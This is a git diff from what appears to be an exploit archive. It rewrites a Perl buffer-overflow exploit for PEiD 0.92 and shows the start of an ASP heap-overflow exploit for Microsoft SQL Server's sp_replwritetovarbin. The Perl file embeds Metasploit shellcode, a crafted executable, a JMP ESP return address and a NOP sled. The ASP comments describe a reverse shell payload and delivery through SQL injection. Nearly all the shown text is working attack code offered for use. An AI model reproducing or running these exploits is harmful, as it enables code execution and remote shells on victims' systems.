-"\x16\x3A\xD3\x74\x05\x80\xFA\x20\x74\x05\x80\xFA\x09\x75\x03\x46\xEB\xED\x8A\x16\x3A\xD3\x74\x46\x80\xFA\x22\x75\x17\x46\x40\x89".
-"\x31\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3\x74\x23\x80\xFA\x22\x74\x1E\x46\xEB\xF2\x89\x31\x40\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3".
-"\x74\x0D\x80\xFA\x20\x74\x08\x80\xFA\x09\x74\x03\x46\xEB\xED\x38\x1E\x74\x0B\x88\x1E\x46\x81\xF9\x38\x32\x40\x00\x7C\xA1\x5F\x5E".
-"\x5B\xC3\x8B\x44\x24\x04\x0F\xAF\x44\x24\x08\x50\x6A\x08\xFF\x15\x14\x20\x40\x00\x50\xFF\x15\x00\x20\x40\x00\xC3\x00\x00\x00\x00".
-"\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00".
-"\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\x90\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAA\x20\x00\x00".
-"\x24\x20\x00\x00\x6C\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x21\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00".
-"\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\xBE\x01\x4D\x65".
-"\x73\x73\x61\x67\x65\x42\x6F\x78\x41";
-my $exe_part2 = 
-"\x00\x55\x53\x45\x52\x33\x32\x2E\x64\x6C\x6C\x00\x00\xDF\x02\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x00\x52\x01\x47\x65\x74\x53\x74".
-"\x64\x48\x61\x6E\x64\x6C\x65\x00\x00\x7D\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x02\x03\x6C\x73\x74\x72\x63\x70\x79".
-"\x41\x00\x00\x99\x01\x48\x65\x61\x70\x41\x6C\x6C\x6F\x63\x00\x40\x01\x47\x65\x74\x50\x72\x6F\x63\x65\x73\x73\x48\x65\x61\x70\x00".
-"\x00\x08\x03\x6C\x73\x74\x72\x6C\x65\x6E\x41\x00\x00\xCA\x00\x47\x65\x74\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E\x65\x41\x00\x4B".
-"\x45\x52\x4E\x45\x4C\x33\x32\x2E\x64\x6C\x6C\x00\x00\xAE\x02\x77\x76\x73\x70\x72\x69\x6E\x74\x66\x41\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48".
-"\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x00\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-my $len = 564 - (length($shellcode) + 100);
-my $overflow1 = "\x41" x 100;
-my $overflow2 = "\x41" x $len;
-my $overflow3 = "\x90" x 3;
-my $eip = "\xa2\x33\x46\x00";#00463379   > FFE4           JMP ESP or 004633A2   . FFE4           JMP ESP
-my $long_jmp = "\xe9\x0b\xfe\xff\xff";
-my $nopsled = "\x90" x 20;
-
-open(my $exe, "> s.eXe");
-binmode $exe;
-print $exe $exe_part1.$overflow1.$shellcode.$overflow2.$long_jmp.$overflow3.$eip.$long_jmp.$nopsled.$shellcode.$overflow2.$exe_part2;
-close($exe);
-
-# milw0rm.com [2008-12-05]
+#!/usr/bin/perl
+# 
+# PEiD <= 0.92 Buffer Overflow Universal Exploit
+# Exploit by SkD (skdrat@hotmail.com)
+# ----------------------------------------------
+# An old vulnerability but no existing exploit 
+# for it, so here it is. Of course, I had to make it
+# universal because of that.This exploit will work
+# on all OS versions (XP, Vista, 2003, 2000).
+# You have limited space for the shellcode 
+# (around 500, it can be tweaked for more space)
+# and there are no character restrictions.
+#
+# You can download PEiD 0.92 here:
+# http://www.absolutelock.de/construction/files/releases/PEiD.zip
+#
+# To trigger the exploit, load the created executable and then
+# click the "First Bytes" arrow. 
+# Check it out :).
+#
+# Note:
+# Author has no responsibility over the damage you do with this.
+
+use strict; use warnings;
+
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19".
+"\xc5\xd8\x59\x83\xeb\xfc\xe2\xf4\xe5\x2d\x9c\x59\x19\xc5\x53\x1c".
+"\x25\x4e\xa4\x5c\x61\xc4\x37\xd2\x56\xdd\x53\x06\x39\xc4\x33\x10".
+"\x92\xf1\x53\x58\xf7\xf4\x18\xc0\xb5\x41\x18\x2d\x1e\x04\x12\x54".
+"\x18\x07\x33\xad\x22\x91\xfc\x5d\x6c\x20\x53\x06\x3d\xc4\x33\x3f".
+"\x92\xc9\x93\xd2\x46\xd9\xd9\xb2\x92\xd9\x53\x58\xf2\x4c\x84\x7d".
+"\x1d\x06\xe9\x99\x7d\x4e\x98\x69\x9c\x05\xa0\x55\x92\x85\xd4\xd2".
+"\x69\xd9\x75\xd2\x71\xcd\x33\x50\x92\x45\x68\x59\x19\xc5\x53\x31".
+"\x25\x9a\xe9\xaf\x79\x93\x51\xa1\x9a\x05\xa3\x09\x71\x35\x52\x5d".
+"\x46\xad\x40\xa7\x93\xcb\x8f\xa6\xfe\xa6\xb9\x35\x7a\xeb\xbd\x21".
+"\x7c\xc5\xd8\x59";
+my $exe_part1 = 
+"\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC8\x00\x00\x00".
+"\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F".
+"\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00".
+"\xA5\x8A\x2D\xC7\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xE1\xEB\x43\x94\xBE\xC9\x48\x94\xE4\xEB\x43\x94\xE1\xEB\x42\x94\xEA\xEB\x43\x94".
+"\x83\xF4\x50\x94\xE4\xEB\x43\x94\x09\xF4\x48\x94\xE3\xEB\x43\x94\x52\x69\x63\x68\xE1\xEB\x43\x94\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00\x86\xE1\x38\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\x0F\x01".
+"\x0B\x01\x06\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x72\x10\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00".
+"\x00\x10\x00\x00\x00\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x04\x00\x00".
+"\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x30\x20\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x20\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x2E\x74\x65\x78\x74\x00\x00\x00\xFC\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x72\x64\x61\x74\x61\x00\x00\x44\x01\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2E\x64\x61\x74\x61\x00\x00\x00\x3C\x02\x00\x00\x00\x30\x00\x00".
+"\x00\x02\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x6A\x00\x68\x28\x30\x40\x00\x68\x18\x30\x40\x00\x6A\x00\xFF\x15\x24\x20\x40\x00\x68\x08\x30\x40\x00\xE8\x12\x00\x00\x00\x83\xC4".
+"\x04\x33\xC0\xC3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x81\xEC\x04\x04\x00\x00\x8D\x45\x0C\x56\x50\x8D\x85".
+"\xFC\xFB\xFF\xFF\xFF\x75\x08\x50\xFF\x15\x28\x20\x40\x00\x8B\xF0\x8D\x45\xFC\x6A\x00\x50\x8D\x85\xFC\xFB\xFF\xFF\x56\x50\x6A\xF5".
+"\xFF\x15\x08\x20\x40\x00\x50\xFF\x15\x04\x20\x40\x00\x8B\xC6\x5E\xC9\xC3\x56\xE8\x83\x00\x00\x00\x8B\xF0\xE8\x48\x00\x00\x00\x68".
+"\x04\x30\x40\x00\x68\x00\x30\x40\x00\xE8\x1F\x00\x00\x00\x6A\x00\x68\x38\x30\x40\x00\x56\xE8\x65\xFF\xFF\xFF\x83\xC4\x14\x8B\xF0".
+"\xE8\x3A\x00\x00\x00\x56\xFF\x15\x0C\x20\x40\x00\x5E\x56\x8B\x74\x24\x08\x3B\x74\x24\x0C\x73\x0D\x8B\x06\x85\xC0\x74\x02\xFF\xD0".
+"\x83\xC6\x04\xEB\xED\x5E\xC3\x6A\x20\x58\x6A\x04\x50\xA3\x30\x30\x40\x00\xE8\x0B\x01\x00\x00\x59\xA3\x2C\x30\x40\x00\x59\xC3\x8B".
+"\x0D\x34\x30\x40\x00\x85\xC9\x74\x11\xA1\x2C\x30\x40\x00\x8D\x0C\x88\x51\x50\xE8\xB5\xFF\xFF\xFF\x59\x59\xC3\x53\x56\x33\xDB\x57".
+"\x89\x1D\x38\x30\x40\x00\xFF\x15\x1C\x20\x40\x00\x8B\xF8\x57\xFF\x15\x18\x20\x40\x00\x40\x50\x53\xFF\x15\x14\x20\x40\x00\x50\xFF".
+"\x15\x00\x20\x40\x00\x8B\xF0\x3B\xF3\x75\x07\x33\xC0\xE9\xAC\x00\x00\x00\x57\x56\xFF\x15\x10\x20\x40\x00\x80\x3E\x22\x75\x1A\x46".
+"\x89\x35\x38\x30\x40\x00\x8A\x06\x3A\xC3\x74\x07\x3C\x22\x74\x03\x46\xEB\xF3\x38\x1E\x75\x1D\xEB\xD2\x89\x35\x38\x30\x40\x00\x8A".
+"\x06\x3A\xC3\x74\x0B\x3C\x20\x74\x07\x3C\x09\x74\x03\x46\xEB\xEF\x38\x1E\x74\x03\x88\x1E\x46\x6A\x01\xB9\x3C\x30\x40\x00\x58\x8A".
+"\x16\x3A\xD3\x74\x05\x80\xFA\x20\x74\x05\x80\xFA\x09\x75\x03\x46\xEB\xED\x8A\x16\x3A\xD3\x74\x46\x80\xFA\x22\x75\x17\x46\x40\x89".
+"\x31\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3\x74\x23\x80\xFA\x22\x74\x1E\x46\xEB\xF2\x89\x31\x40\x83\xC1\x04\x89\x19\x8A\x16\x3A\xD3".
+"\x74\x0D\x80\xFA\x20\x74\x08\x80\xFA\x09\x74\x03\x46\xEB\xED\x38\x1E\x74\x0B\x88\x1E\x46\x81\xF9\x38\x32\x40\x00\x7C\xA1\x5F\x5E".
+"\x5B\xC3\x8B\x44\x24\x04\x0F\xAF\x44\x24\x08\x50\x6A\x08\xFF\x15\x14\x20\x40\x00\x50\xFF\x15\x00\x20\x40\x00\xC3\x00\x00\x00\x00".
+"\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00".
+"\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\x90\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAA\x20\x00\x00".
+"\x24\x20\x00\x00\x6C\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x21\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEC\x20\x00\x00\xB6\x20\x00\x00\xC2\x20\x00\x00\xD2\x20\x00\x00\xE0\x20\x00\x00".
+"\xF8\x20\x00\x00\x0A\x21\x00\x00\x16\x21\x00\x00\x00\x00\x00\x00\x9C\x20\x00\x00\x36\x21\x00\x00\x00\x00\x00\x00\xBE\x01\x4D\x65".
+"\x73\x73\x61\x67\x65\x42\x6F\x78\x41";
+my $exe_part2 = 
+"\x00\x55\x53\x45\x52\x33\x32\x2E\x64\x6C\x6C\x00\x00\xDF\x02\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x00\x52\x01\x47\x65\x74\x53\x74".
+"\x64\x48\x61\x6E\x64\x6C\x65\x00\x00\x7D\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x02\x03\x6C\x73\x74\x72\x63\x70\x79".
+"\x41\x00\x00\x99\x01\x48\x65\x61\x70\x41\x6C\x6C\x6F\x63\x00\x40\x01\x47\x65\x74\x50\x72\x6F\x63\x65\x73\x73\x48\x65\x61\x70\x00".
+"\x00\x08\x03\x6C\x73\x74\x72\x6C\x65\x6E\x41\x00\x00\xCA\x00\x47\x65\x74\x43\x6F\x6D\x6D\x61\x6E\x64\x4C\x69\x6E\x65\x41\x00\x4B".
+"\x45\x52\x4E\x45\x4C\x33\x32\x2E\x64\x6C\x6C\x00\x00\xAE\x02\x77\x76\x73\x70\x72\x69\x6E\x74\x66\x41\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48".
+"\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x00\x00\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+my $len = 564 - (length($shellcode) + 100);
+my $overflow1 = "\x41" x 100;
+my $overflow2 = "\x41" x $len;
+my $overflow3 = "\x90" x 3;
+my $eip = "\xa2\x33\x46\x00";#00463379   > FFE4           JMP ESP or 004633A2   . FFE4           JMP ESP
+my $long_jmp = "\xe9\x0b\xfe\xff\xff";
+my $nopsled = "\x90" x 20;
+
+open(my $exe, "> s.eXe");
+binmode $exe;
+print $exe $exe_part1.$overflow1.$shellcode.$overflow2.$long_jmp.$overflow3.$eip.$long_jmp.$nopsled.$shellcode.$overflow2.$exe_part2;
+close($exe);
+
+# milw0rm.com [2008-12-05]
diff --git a/platforms/windows/local/7501.asp b/platforms/windows/local/7501.asp
index c6fec7324..f0f197288 100755
--- a/platforms/windows/local/7501.asp
+++ b/platforms/windows/local/7501.asp
@@ -1,246 +1,246 @@
-<html>
-<%
-// k`sOSe 12/17/2008
-// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
-// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
-// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
-// the change allows multiple shots :)
-// 
-// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.
-
-// Take a look at the comments in T-SQL
-
-
-
-On Error Resume Next
-
-// change this
-UserName = "r00t"
-Password = "t00r"
-
-// ########################################### FIRST QUERY
-SQL = "DECLARE @buf NVARCHAR(4000),				"&_
-"@val NVARCHAR(4),						"&_
-"@counter INT							"&_
-"SET @buf = '							"&_ 
-"declare @retcode int,						"&_
-"@end_offset int,						"&_
-"@vb_buffer varbinary,						"&_
-"@vb_bufferlen int						"&_  
-"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
-"SET @val = CHAR(0x41)						"&_
-"SET @counter = 0						"&_
-"WHILE @counter < 3020						"&_
-"BEGIN								"&_
-"  SET @counter = @counter + 1					"&_
-"  IF @counter = 2900						"&_	 
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x43)					"&_
-"  END								"&_
-"  ELSE IF @counter = 299					"&_
-"  BEGIN							"&_
-"    SET @val =  CHAR(0x42)					"&_
-"  END								"&_
-"  ELSE IF @counter = 300					"&_
-"  BEGIN							"&_
-
-
-"     /* First byte overwritten here. This is a random writable address */	"&_
-"     SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
-"     CONTINUE							"&_
-"  END								"&_
-"  SET @buf = @buf + @val					"&_
-"END								"&_
-"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''   "&_
-"EXEC master..sp_executesql @buf"							
-
-
-
-
-
-// ########################################### SECOND QUERY
-SQL2 = "DECLARE @buf NVARCHAR(4000),				"&_
-"@val NVARCHAR(4),						"&_
-"@counter INT							"&_
-"SET @buf = '							"&_ 
-"declare @retcode int,						"&_
-"@end_offset int,						"&_
-"@vb_buffer varbinary,						"&_
-"@vb_bufferlen int						"&_  
-"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
